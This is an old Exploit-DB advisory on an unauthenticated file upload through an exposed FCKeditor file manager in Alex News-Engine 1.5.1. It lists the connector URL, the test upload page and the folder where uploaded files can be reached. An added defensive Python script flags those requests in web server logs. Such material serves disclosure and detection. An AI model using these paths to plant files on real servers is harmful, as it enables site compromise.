Alex News-Engine 1.5.1 Remote Arbitrary File Upload Vulnerability



EDB-ID: 7157 | CVE: N/A | OSVDB-ID: 50034
Author: Batter | Published: 2008-11-19 | Verified: Verified
########################################################################
#
#                        Yellow Flood Organization
#
# Alex News-engine (fckeditor) Arbitrary File Upload
#
# Source: http://www.alexscriptengine.de/blog/category/news-engine/
#
# Download: http://www.alexscriptengine.de/blog/asedownloads/news-engine/
#
# Discovered by: Batter
#
########################################################################
####################
- Vulnerability:
####################
/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/
####################
- Exploit:
####################
http://www.site.com/path/admin/includes/FCKeditor/editor/filemanager/browser/default/connectors/test.html
####################
- How to use:
####################
http://www.site.com/script-folder-name/script-folder-name/images/site_images/uploadet-file.*
####################
- Solution:
####################
Restrict access to these resources so that only trusted users can reach them.
####################
- Greets :
####################
THE.HACKER.ONE , Str0ke
####################
# milw0rm.com [2008-11-19]
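
For defenders, an added detection example (not part of the original advisory): it scans web server access logs for requests to the FCKeditor connector paths named above and for script files served from the images/site_images/ upload directory. It assumes Combined Log Format; the sample log lines, file names and the script-extension list are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format prefix: client, timestamp, request line, status.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" (\d{3}) ')
# Paths taken from the advisory; matched case-insensitively.
CONNECTORS = re.compile(r'/fckeditor/editor/filemanager/browser/default/connectors/', re.I)
UPLOAD_DIR = re.compile(r'/images/site_images/', re.I)
# Assumption: extensions this server would hand to an interpreter.
SCRIPT_EXT = re.compile(r'\.(php\d?|phtml|phar|pl|cgi|asp|aspx|jsp)(\.|$)', re.I)

def scan(lines):
    """Return (line_no, client, status, tag) for each suspicious request."""
    findings, uploaders = [], set()
    for n, line in enumerate(lines, 1):
        m = LINE.match(line)
        if not m:
            continue  # not an access-log line we understand
        client, method, target, status = m.groups()
        url = urlsplit(target)
        query = parse_qs(url.query)
        if CONNECTORS.search(url.path):
            if url.path.lower().endswith('/test.html'):
                findings.append((n, client, status, 'connector-test-page'))
            elif method == 'POST' and 'FileUpload' in query.get('Command', []):
                uploaders.add(client)  # remember who used the upload command
                findings.append((n, client, status, 'connector-upload'))
        elif UPLOAD_DIR.search(url.path) and SCRIPT_EXT.search(url.path):
            tag = 'script-after-upload' if client in uploaders else 'script-in-upload-dir'
            findings.append((n, client, status, tag))
    return findings

# Constructed sample log (documentation addresses, hypothetical file names).
SAMPLE = [
    '192.0.2.10 - - [19/Nov/2008:10:00:01 +0000] "GET /news/admin/includes/FCKeditor/editor/filemanager/browser/default/connectors/test.html HTTP/1.1" 200 5120 "-" "-"',
    '192.0.2.10 - - [19/Nov/2008:10:00:09 +0000] "POST /news/editors/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=/ HTTP/1.1" 200 210 "-" "-"',
    '192.0.2.10 - - [19/Nov/2008:10:00:15 +0000] "GET /news/images/site_images/example.php HTTP/1.1" 200 48 "-" "-"',
    '198.51.100.7 - - [19/Nov/2008:10:02:00 +0000] "GET /news/images/site_images/logo.png HTTP/1.1" 200 9000 "-" "-"',
    '198.51.100.7 - - [19/Nov/2008:10:03:00 +0000] "GET /news/images/site_images/old.php.bak HTTP/1.1" 404 300 "-" "-"',
]

if __name__ == '__main__':
    for finding in scan(SAMPLE):
        print(finding)
```

A 200 status on the connector-test-page or connector-upload findings means the file manager is reachable without authentication on that host and should be removed or placed behind access control.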





